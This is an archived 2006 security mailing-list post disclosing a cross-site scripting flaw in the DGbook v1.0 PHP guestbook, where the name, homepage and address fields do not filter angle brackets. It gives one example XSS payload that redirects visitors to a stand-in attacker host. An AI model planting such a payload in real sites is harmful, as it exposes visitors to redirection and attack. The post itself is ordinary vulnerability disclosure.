|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
DGbook v1.0 - XSS
luny
youfucktard.com
Date: Mon May 22 2006 - 19:39:50 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
DGbook v1.0 - XSS
Homepage:
http://www.diangemilang.com/dgscripts.php
Description:
This is Guestbook script, write on PHP from Dian Gemilang. Feature: Field validation, Limit character, Charecter filtering - This feature will remove "<" and ">" character, so user can't input HTML tag -, Auto Focus - This feature will make user cursor on the first form field - It's easy to install. Requare PHP, MYQL and phpmyadmin for dump the database.
Effected files:
Name, homepage, and address input boxes on index.php
XSS Vuln:
< and > may be filtered however, they are not filtered in the name, homepage and address text boxes. Only in the comment box.
Example of putting html code in the name & address box:
<DIV STYLE="background-image: url(javascript:window.location('http://www.evilsite.com'))">
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]